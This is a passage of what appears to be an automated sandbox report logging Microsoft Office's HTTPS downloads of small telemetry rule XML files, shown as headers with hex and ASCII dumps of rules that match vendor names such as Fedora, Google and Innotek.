                                                                                                              2024-12-05 09:38:32 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              45192.168.2.64977513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:31 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:32 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 475
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                              x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093832Z-1746fd949bdlqd7fhC1EWR6vt000000002n0000000006ccs
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:32 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              46192.168.2.64977713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:31 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:32 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 491
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                              x-ms-request-id: 715419d5-801e-0078-38c7-45bac6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093832Z-1746fd949bd4w8sthC1EWR700400000002c0000000000qa2
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:32 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              47192.168.2.64977813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:33 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:33 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 416
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                              x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093833Z-1746fd949bdlqd7fhC1EWR6vt000000002mg000000007np8
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:34 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              48192.168.2.64978013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:34 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 479
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                              x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093834Z-1746fd949bdl6zq5hC1EWRf3ws0000000240000000006wqt
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:34 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              49192.168.2.64978113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:34 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 471
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                              x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093834Z-1746fd949bdl6zq5hC1EWRf3ws000000028g000000001uaq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:34 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              50192.168.2.64977913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:34 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 415
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                              x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093834Z-1746fd949bd77mkmhC1EWR5efc00000002q0000000008cfw
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              51192.168.2.64978213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:34 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                              x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093834Z-1746fd949bdjzh7thC1EWR3g6400000002g0000000006tzt
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              52192.168.2.64978413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:35 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 477
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                              ETag: "0x8DC582BA54DCC28"
                                                                                                              x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093836Z-1746fd949bdwt8wrhC1EWRu6rg00000002s0000000001hs5
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              53192.168.2.64978513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:36 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                              x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093836Z-1746fd949bdkw94lhC1EWRxuz400000002q00000000040p2
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              54192.168.2.64978613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:36 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 477
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                              x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093836Z-1746fd949bdlnsqphC1EWRurw000000002bg000000005cdh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              55192.168.2.64978713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
